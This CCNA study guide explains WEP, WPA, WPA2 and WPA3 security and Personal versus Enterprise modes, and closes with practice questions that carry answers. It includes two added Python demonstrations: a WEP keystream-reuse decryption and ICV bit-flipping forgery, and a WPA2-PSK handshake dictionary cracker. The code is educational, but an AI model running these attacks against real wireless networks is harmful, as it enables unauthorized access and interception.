
CCNA Wireless Security: WEP, WPA, WPA2, WPA3 & PSK vs Enterprise

Wireless security is a required topic on CCNA 200-301. You need to understand the progression from WEP (broken) through WPA, WPA2, and WPA3, the difference between Personal (PSK) and Enterprise (802.1X) modes, and the encryption algorithms each generation uses. This guide covers the key security features, their weaknesses, and what the exam expects you to know about each standard.


WEP: the broken original

Wired Equivalent Privacy (WEP) was the original 802.11 security mechanism, defined in the 1997 standard. WEP encrypts with the RC4 stream cipher under a static 40-bit or 104-bit key; for each packet RC4 is keyed with a 24-bit Initialization Vector (IV) prepended to that static key, and the IV is sent in the clear. The 24-bit IV space (about 16.7 million values) is exhausted within hours on a busy network, so IVs repeat, and any two packets encrypted under the same IV share a keystream: one known plaintext exposes the other. The integrity check value (ICV) is an unkeyed CRC-32, which is linear, so an attacker can flip bits in a ciphertext and fix up the ICV without detection. Finally, RC4's weak-key behaviour with IV-prefixed keys (the FMS attack of 2001 and the faster PTW attack of 2007) lets an attacker recover the static key itself from passively captured traffic. WEP can be cracked in minutes with freely available tools.

WEP should never be used. It is included in CCNA only as historical context and to understand why later standards were developed. If you see WEP as an answer option and the question is about 'secure' or 'recommended' — eliminate it immediately.
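The two structural flaws above, keystream reuse under a repeated IV and the linear CRC-32 ICV, can be shown in a few dozen lines. The following is an added example, not code from the original page: it implements RC4 and the WEP encapsulation (IV || RC4(IV || key) applied to plaintext || CRC-32), and all values (the 40-bit key, the IV and both frame payloads) are constructed. The 802.11 header and FCS are omitted. The key-recovery attacks (FMS/PTW) need many thousands of captured IVs and are not reproduced here; the example shows only that one known plaintext under a reused IV decrypts other frames, and that a ciphertext can be altered with a still-valid ICV, both without the WEP key.

```python
"""WEP keystream reuse and ICV bit-flipping (added example, constructed values)."""
import zlib

KEY = bytes.fromhex("0badc0ffee")   # constructed 40-bit static WEP key
IV = bytes.fromhex("a1b2c3")        # constructed 24-bit IV; only 2**24 distinct values exist
KNOWN_PLAINTEXT = b"GET /index.html HTTP/1.0\r\n"   # constructed: a predictable request body
SECRET_PLAINTEXT = b"secret=hunter2"                # constructed: a later frame, same IV


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling followed by the PRGA; returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: an unkeyed CRC-32, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Per-packet RC4 key is IV || static key; the IV is transmitted in the clear."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Returns (plaintext, icv_ok) as a receiver that knows the key would compute them."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4_keystream(iv + key, len(ct)))
    plaintext, received_icv = body[:-4], body[-4:]
    return plaintext, received_icv == icv(plaintext)


def recover_keystream(frame: bytes, known_plaintext: bytes):
    """Attack 1: one known plaintext yields the keystream for that frame's IV."""
    iv, ct = frame[:3], frame[3:]
    return iv, xor(ct, known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(frame: bytes, iv: bytes, keystream: bytes) -> bytes:
    """Any other frame under the same IV falls to the recovered keystream, key unknown.
    Only as many bytes as the keystream covers can be recovered."""
    if frame[:3] != iv:
        raise ValueError("frame uses a different IV")
    ct = frame[3:]
    if len(keystream) >= len(ct):
        return xor(ct, keystream)[:-4]   # whole body recovered; drop the ICV
    return xor(ct, keystream)            # partial: only the covered prefix


def flip_bits(frame: bytes, offset: int, mask: bytes) -> bytes:
    """Attack 2: CRC-32 is linear, crc(a ^ b) == crc(a) ^ crc(b) ^ crc(zeros), so XORing
    a delta into the ciphertext and patching the encrypted ICV keeps the ICV valid."""
    iv, ct = frame[:3], frame[3:]
    n = len(ct) - 4
    if offset + len(mask) > n:
        raise ValueError("mask runs past the plaintext")
    delta = bytearray(n)
    delta[offset:offset + len(mask)] = mask
    delta = bytes(delta)
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(n))).to_bytes(4, "little")
    return iv + xor(ct, delta + icv_delta)


if __name__ == "__main__":
    f_known = wep_encrypt(KEY, IV, KNOWN_PLAINTEXT)
    f_secret = wep_encrypt(KEY, IV, SECRET_PLAINTEXT)   # same IV reused by the sender
    iv, ks = recover_keystream(f_known, KNOWN_PLAINTEXT)
    print(decrypt_with_keystream(f_secret, iv, ks))     # b'secret=hunter2'
    forged = flip_bits(f_secret, 7, b"\x01")            # turns 'h' into 'i'
    print(wep_decrypt(KEY, forged))                     # (b'secret=iunter2', True)
```

The receiver in the last line accepts the forged frame as intact, which is why WEP gives no protection against injection or modification; TKIP's keyed Michael MIC and CCMP's CBC-MAC exist precisely to close this gap.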

WPA: the interim fix

Wi-Fi Protected Access (WPA) was released in 2003 as an emergency replacement for WEP while 802.11i (WPA2) was being finalized. WPA uses TKIP (Temporal Key Integrity Protocol), which keeps RC4 so that it can run on WEP hardware but wraps it in three fixes: a 48-bit sequence counter replaces the 24-bit IV, per-packet key mixing gives every frame a different RC4 key (removing WEP's related-key weakness), and a keyed message integrity code (MIC, called 'Michael') replaces the linear CRC-32 ICV.

WPA was designed to run on existing WEP hardware via firmware update. While significantly more secure than WEP, TKIP has known weaknesses: Michael is a deliberately cheap MIC that relies on countermeasures (a 60-second shutdown after two MIC failures within a minute), and the Beck-Tews attack (2008) exploits this to recover the MIC key and decrypt short packets. WPA/TKIP is deprecated and should be replaced with WPA2 or WPA3.

WPA introduced the Personal (PSK) and Enterprise (802.1X) modes that carry through to WPA2 and WPA3.

WPA2: the current standard

WPA2 (802.11i) replaced WPA as the security standard in 2004. WPA2 uses CCMP (Counter Mode with CBC-MAC Protocol), which is AES-128 in CCM mode: counter mode for confidentiality and CBC-MAC for integrity, a fundamentally stronger design than RC4 with a bolted-on MIC. WPA2 is the minimum acceptable security standard for any current wireless deployment.

WPA2-Personal (WPA2-PSK) uses a Pre-Shared Key: a passphrase known to all users. The Pairwise Master Key (PMK) is derived from it with PBKDF2-HMAC-SHA1, using the SSID as the salt and 4096 iterations, so every client on the SSID holds the same 256-bit PMK. The 4-way handshake then derives a per-session Pairwise Transient Key (PTK) from the PMK, both MAC addresses and two nonces that are exchanged in the clear. Personal mode is simple to deploy, but if the passphrase is compromised every client is affected, and there is no per-user identity.

WPA2-Enterprise uses 802.1X/EAP for authentication. Each user has individual credentials that are authenticated by a RADIUS server. The EAP exchange produces a fresh PMK for every session, which the RADIUS server delivers to the AP, so compromise of one user's keys does not affect others. Enterprise mode provides the identity-based access control needed for corporate networks.

WPA2 vulnerabilities: KRACK (Key Reinstallation Attack, 2017) showed that replaying message 3 of the 4-way handshake makes a client reinstall its key and reset the packet nonce, so keystream is reused; it is mitigated by client and AP patches. Separately, a captured 4-way handshake is enough to test passphrase guesses offline, because everything except the PMK is transmitted in the clear; PBKDF2's 4096 iterations slow each guess but do not stop a dictionary attack on a weak passphrase. Use long, random passphrases.
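The PMK and PTK derivation described for WPA2-Personal above, and the offline dictionary attack on a captured handshake that it enables, are shown together in the following added example (not code from the original page). The SSID, MAC addresses, nonces and the weak passphrase are constructed, and the EAPOL-Key message 2 is assembled by the code rather than captured off the air. The derivation itself follows 802.11: PBKDF2-HMAC-SHA1 for the PMK, PRF-384 built from HMAC-SHA1 for the PTK, and HMAC-SHA1 truncated to 128 bits for the MIC used with the CCMP key descriptor (key info version 2).

```python
"""WPA2-PSK key derivation and an offline dictionary attack on a 4-way handshake
(added example; SSID, MACs, nonces, passphrase and the EAPOL frame are constructed)."""
import hashlib
import hmac

SSID = "CorpGuest"                        # constructed
AP_MAC = bytes.fromhex("0c8ddb112233")    # constructed authenticator address (AA)
STA_MAC = bytes.fromhex("5c5188aabbcc")   # constructed supplicant address (SPA)
ANONCE = bytes(range(0x10, 0x30))         # constructed 32-byte AP nonce (message 1)
SNONCE = bytes(range(0x40, 0x60))         # constructed 32-byte client nonce (message 2)
PASSPHRASE = "summer2023"                 # constructed weak passphrase
MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields precede the MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    Every client on the SSID derives this same value from the shared passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_384(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11 PRF from HMAC-SHA1; four 20-byte blocks cover the 48 bytes needed."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:48]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||
    min(ANonce,SNonce)||max(ANonce,SNonce)); KCK = PTK[0:16], KEK = [16:32], TK = [32:48].
    Everything here except the PMK crosses the air in the clear."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_384(pmk, b"Pairwise key expansion", data)


def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP); the RSN IE key data is left empty."""
    body = (
        b"\x02"                        # descriptor type: RSN key descriptor
        + (0x010A).to_bytes(2, "big")  # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC set
        + (0).to_bytes(2, "big")       # key length
        + (1).to_bytes(8, "big")       # replay counter
        + snonce                       # key nonce
        + bytes(16)                    # key IV
        + bytes(8)                     # key RSC
        + bytes(8)                     # key ID (reserved)
        + mic                          # key MIC (zero while the MIC is computed)
        + (0).to_bytes(2, "big")       # key data length
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v2, type EAPOL-Key


def compute_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC = HMAC-SHA1(KCK, EAPOL frame with the MIC field zeroed), first 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def make_handshake_capture(passphrase: str) -> bytes:
    """Message 2 as a legitimate client sends it: this is what a sniffer records."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, compute_mic(kck, build_msg2(SNONCE)))


def crack(capture: bytes, wordlist):
    """Offline attack: redo PBKDF2 and the PRF per candidate and compare the MIC.
    No further contact with the network is needed; only PBKDF2's cost slows each guess."""
    captured_mic = capture[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(compute_mic(kck, capture), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    capture = make_handshake_capture(PASSPHRASE)
    print(crack(capture, ["password", "letmein", "summer2023", "qwerty"]))   # summer2023
```

The same derivation explains why WPA2-PSK has no forward secrecy: an attacker holding the passphrase and a recording of the nonces can call derive_ptk, take the TK and decrypt that session after the fact. SAE in WPA3-Personal breaks both links, since its PMK is the output of an interactive exchange rather than a function of the passphrase alone.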

WPA3: the current best practice

WPA3 was released in 2018 to address WPA2 weaknesses. WPA3-Personal replaces the PSK 4-way handshake with SAE (Simultaneous Authentication of Equals), a password-authenticated key exchange based on the Dragonfly handshake. The PMK is the output of that exchange rather than a direct function of the passphrase, so SAE provides forward secrecy: even if an attacker records traffic and later obtains the passphrase, they cannot decrypt previously recorded sessions. SAE also resists offline dictionary attacks, because each guess requires a live exchange with the network rather than a computation over a captured handshake. WPA3 additionally makes Protected Management Frames (802.11w) mandatory.

WPA3-Enterprise is WPA2-Enterprise with PMF required, plus an optional 192-bit security mode (aligned with the CNSA suite) for high-security environments. In that mode the cipher is GCMP-256 (AES-256 in GCM), key derivation uses HMAC-SHA-384, and the EAP-TLS credentials must be equally strong (ECDHE/ECDSA on the P-384 curve, or RSA with 3072-bit keys).

WPA3 Enhanced Open (OWE, Opportunistic Wireless Encryption, RFC 8110) encrypts open-network traffic without a password: client and AP run an unauthenticated Diffie-Hellman exchange during association and derive a per-client PMK from it. This protects users on public Wi-Fi from passive eavesdropping, where previously open networks carried all traffic in plaintext. Because nothing is authenticated, OWE does not protect against an active attacker running a rogue AP with the same SSID.

WPA3 transition mode allows WPA3 and WPA2 devices to coexist on the same SSID during migration: the AP advertises both SAE and PSK, and PMF is optional so that WPA2 clients can still join. A WPA2 client on that SSID still performs the PSK 4-way handshake, so its traffic remains exposed to offline dictionary attacks until every client moves to WPA3. For CCNA: know the key improvements: SAE replaces PSK, forward secrecy, PMF required, and an optional 192-bit mode with GCMP-256 for WPA3-Enterprise.

Authentication methods: Open, PSK, 802.1X

Open authentication (no security): no credentials required and, unless OWE is in use, no encryption. Any device can join. Appropriate only for captive portal environments where a different mechanism handles access control. Never acceptable for corporate networks.

WPA2/3-Personal (PSK/SAE): passphrase authentication. All devices use the same credential. Easy to manage for small environments; doesn't scale because you can't revoke access for one user without changing the passphrase for everyone.

WPA2/3-Enterprise (802.1X/EAP): individual user credentials. Integrates with corporate identity systems (Active Directory via RADIUS). Users can be individually authenticated, authorized, and revoked, and RADIUS accounting records who connected and when. The expected choice in compliance-driven environments (PCI DSS, HIPAA).

Wireless security standard comparison

Standard          | Encryption                                  | Auth method          | Key exchange                                   | Status
WEP               | RC4 (40/104-bit)                            | Open / Shared Key    | Static key, 24-bit IV                          | Broken; never use
WPA               | TKIP (RC4)                                  | PSK or 802.1X        | TKIP per-packet key mixing                     | Deprecated
WPA2-Personal     | CCMP (AES-128)                              | PSK                  | 4-way handshake                                | Current standard
WPA2-Enterprise   | CCMP (AES-128)                              | 802.1X/EAP + RADIUS  | Dynamic per-session PMK                        | Current standard (enterprise)
WPA3-Personal     | CCMP (AES-128)                              | SAE (Dragonfly)      | SAE handshake, forward secrecy                 | Recommended
WPA3-Enterprise   | CCMP (AES-128); GCMP-256 in 192-bit mode    | 802.1X/EAP + RADIUS  | Dynamic per-session PMK; 192-bit suite optional | Highest security

Key exam facts — CCNA

  • WEP: broken, RC4, never use. WPA: TKIP/RC4, deprecated. WPA2: CCMP/AES-128. WPA3: SAE + forward secrecy
  • WPA2-Personal: PSK (shared passphrase). WPA2-Enterprise: 802.1X (individual credentials via RADIUS)
  • SAE (WPA3-Personal) resists offline dictionary attacks and provides forward secrecy
  • CCMP is based on AES — WPA2's encryption. TKIP is based on RC4 — WPA's (weaker)
  • WPA3 Enhanced Open (OWE) encrypts open networks without a password

Common exam traps

WPA2 and WPA3 use the same encryption algorithm

WPA2-Personal and WPA2-Enterprise use CCMP (AES-128). WPA3-Personal also uses CCMP but replaces the PSK handshake with SAE for key establishment. WPA3-Enterprise uses CCMP by default and GCMP-256 (AES-256) in its optional 192-bit mode; only that mode changes the cipher.

Using a complex password with WPA2-Personal is as secure as WPA2-Enterprise

WPA2-Enterprise provides per-user authentication, per-session dynamic keys, and the ability to revoke individual access. WPA2-Personal shares one passphrase among all users — a compromised passphrase affects everyone, and there's no per-user identity or revocation without changing the password.

WEP is acceptable for legacy devices that don't support WPA2

WEP is cryptographically broken and can be cracked in minutes. If a device only supports WEP, it should be replaced or isolated on a separate network with no access to sensitive resources.

Practice questions — Wireless Security (WPA)

These questions are representative of what you will see on CCNA exams. The correct answer and explanation are shown immediately below each question.

Q1. Which wireless security protocol uses CCMP based on AES for encryption?

A. WEP
B. WPA (TKIP)
C. WPA2
D. WPA3-Enterprise only

Explanation (answer: C): WPA2 (802.11i) uses CCMP (Counter Mode with CBC-MAC Protocol) based on AES-128 as its encryption algorithm. WEP and WPA use RC4-based encryption (WEP directly, WPA via TKIP). Option D is wrong because WPA3-Personal uses CCMP as well.

Q2. A hospital needs wireless security where each doctor authenticates with their individual Active Directory credentials. Which solution is appropriate?

A. WPA2-Personal with a strong passphrase
B. WEP with MAC filtering
C. WPA2-Enterprise with 802.1X and RADIUS
D. WPA3-Personal with SAE

Explanation (answer: C): WPA2-Enterprise uses 802.1X/EAP with a RADIUS server that can integrate with Active Directory. Each user authenticates with individual credentials, enabling per-user access control, accounting, and revocation. Both Personal options share one passphrase and give no per-user identity.

Q3. Which WPA3 feature protects previously recorded wireless traffic even if the passphrase is compromised later?

A. AES-256 encryption
B. SAE (Simultaneous Authentication of Equals) with forward secrecy
C. TKIP per-packet key mixing
D. RADIUS integration

Explanation (answer: B): WPA3-Personal uses SAE (Simultaneous Authentication of Equals), which provides forward secrecy. Each session's keys come from the SAE exchange itself rather than from the passphrase alone, so obtaining the passphrase later cannot decrypt previously captured sessions.

Q4. Which statement correctly describes a weakness of WPA2-Personal compared to WPA2-Enterprise?

A. WPA2-Personal uses weaker AES encryption
B. WPA2-Personal cannot encrypt traffic
C. WPA2-Personal uses a shared passphrase with no per-user identity or individual revocation
D. WPA2-Personal requires a RADIUS server

Explanation (answer: C): WPA2-Personal uses the same CCMP/AES-128 encryption as Enterprise but authenticates all users with the same pre-shared passphrase. There is no per-user identity; revoking one user requires changing the passphrase for everyone. Enterprise mode provides individual authentication and revocation.

Q5. WPA3 Enhanced Open (OWE) provides which security feature on open wireless networks?

A. Username/password authentication
B. Encryption of traffic without requiring a password
C. AES-256 mandatory encryption
D. RADIUS server integration

Explanation (answer: B): WPA3 Enhanced Open (Opportunistic Wireless Encryption) encrypts open-network traffic without requiring a passphrase, using an unauthenticated key exchange at association time. This protects against passive eavesdropping on public Wi-Fi networks that previously transmitted all data in plaintext; it does not authenticate the network or the user.

Frequently asked questions — Wireless Security (WPA)

What is the difference between WPA2-Personal and WPA2-Enterprise?

WPA2-Personal uses a pre-shared key (passphrase) — all users share the same credential. WPA2-Enterprise uses 802.1X/EAP with a RADIUS server — each user authenticates with individual credentials. Enterprise provides per-user identity, accounting, and the ability to revoke individual access without affecting other users.

Why is WEP considered broken?

WEP uses RC4 keyed with a static key and a 24-bit Initialization Vector (IV) that repeats frequently on a busy network. IV reuse means keystream reuse, which exposes plaintext, and RC4's weak-key behaviour under IV-prefixed keys lets an attacker recover the key itself from passively captured traffic; tools crack WEP in minutes without knowing the password. Its CRC-32 integrity check is unkeyed and linear, so WEP also has no protection against traffic modification or injection.

What makes WPA3 better than WPA2?

WPA3-Personal replaces the PSK handshake with SAE (Simultaneous Authentication of Equals), providing forward secrecy and resistance to offline dictionary attacks. WPA3-Enterprise requires Protected Management Frames and adds an optional 192-bit mode (GCMP-256, SHA-384) for high-security environments. WPA3 Enhanced Open encrypts previously plaintext open networks. SAE forward secrecy is the most significant improvement.

What encryption does WPA use vs WPA2?

WPA uses TKIP (Temporal Key Integrity Protocol) based on RC4 — it was designed to run on WEP hardware via firmware update. WPA2 uses CCMP (Counter Mode CBC-MAC Protocol) based on AES-128, a fundamentally stronger cipher. TKIP is deprecated; WPA2/CCMP is the minimum acceptable standard.

Can WPA2 and WPA3 devices coexist on the same wireless network?

Yes, through WPA3 Transition Mode. The AP advertises both WPA2 and WPA3 on the same SSID. WPA3-capable devices use WPA3 (SAE); WPA2-only devices use WPA2 (PSK). This allows gradual migration without requiring immediate replacement of all client devices.
